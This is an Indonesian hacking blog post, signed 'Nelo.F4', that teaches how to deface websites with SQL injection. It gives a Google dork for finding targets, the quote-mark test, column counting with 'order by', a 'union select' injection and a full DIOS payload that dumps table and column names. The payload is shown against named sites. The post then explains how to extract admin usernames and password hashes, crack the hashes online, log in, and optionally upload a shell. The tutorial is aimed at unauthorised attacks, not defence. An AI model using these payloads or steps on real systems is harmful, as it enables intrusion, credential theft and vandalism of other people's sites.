Cara Deface Poc Sql Injection With Dios.
Selasa, 14 Mei 2019
Tulis Komentar
CARA DEFACE POC SQL INJECTION WITH DIOS
Assalamualaikum wr wb, Yeyeyeye balik lage sama w Nelo.F4. Di kesempatan kali ini w bakal bikin artikel Cara Deface Poc Sql Injection With Dios. Langsung aja ke tutornya gan sikat!crot
pertama ente siapin aja dolo dorknya di google banyak ko, search aja dork sqli fresh 2019 atau ga pake dork mimin juga bisa
Dork: inurl:.php?id=(terserah ente) site:(terserah ente)
nah kalo udah ngedork, tambahin tanda (') tanpa tanda kurung contohnya kek gini www.kelinci.com/media.php?module=detailproduk&id=209'
sebelum dikasih string '
sesudah di kasih string '
nah kalo ada yang error/gambar ilang di website target itu berarti vulnerability/vuln
nah kalo udah skrg tugas lu orang ngasih tambahan perinta
hasilnya kek gini' order by 1-- -
yap benar sekaleeee website kembali normal, skrg lanjutin order by 2-- - dan seterusnya sampe error INGET SAMPE ERROR.
kalo mau cepet mimin kasih tau misalkan order by 1-- - ga error nah langsung loncat aja ke order by 10-- - gt kalo ga error juga loncat lagi.
nah disini mimin nemuin error di angka 14, berarti sekarang tugas klen ketik perintah union statment sampe nomer 13 WAJIB.
contoh www.kelinci.com/media.php?module=detailproduk&id=-209' union select 1,2,3,4,5,6,7,8,9,10,11,12,13-- -]
jangan lupa juga kasih string (-) tanpa tanda kurung di depan nomer 209 liat contoh! WAJIB!
kalo udah keluar nomer togelnya, langsung dioskan gan!!!!
Dios:(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set
(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
kalo mau dios yang lain cari di guugle mambrak. next diosnya taro di nomer togelnya, kan ditarget nomer togelnya 3 dan 4 mimin taro diosnya di 3 dan hasilnya kek gini
contoh
http://rumahmotogp.com/media.php?module=detailproduk&id=-209' union select 1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set
(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6,7,8,9,10,11,12,13-- -
oke kalo udah, cari yang berhubungan dengan admin,username,password ya!
udah nemu yang berhubungan dengan admin?lansung aja dump. caranya kaya gini.
contoh(Select+export_set(5,@:=0,(select+count(*)from(ini nama tablenya)where@:=export_set(5,export_set(5,@,ini usernamenya,0x3c6c693e,2),ini passwordnya,0xa3a,2)),@,2))
tinggal cari tempat admin loginya deh bisa pake havij atau ga tools admin finder lainya yg ada di github
sekarang waktunya kita login ke admin. ohiya jangan lupa itu kan passwordnya masih berbentuk hash. klen crack hasnya di https://hashkiller.co.uk/Cracker/MD5
Bagi yang belum paham bisa tonton video di bawah
dan seterah mau di upshell apa engga hehehe
Oke mungkin ini perpisahan kyta h3h3h3, Sekian aja dari gw Nelo.F4 kalo ada pertanyaan bisa kontak ke fp Explosion Squad Cyber Di Facebook.kurang lebihnya mohon di maafkan wassalamualaikum wr wb.
Belum ada Komentar untuk "Cara Deface Poc Sql Injection With Dios."
Posting Komentar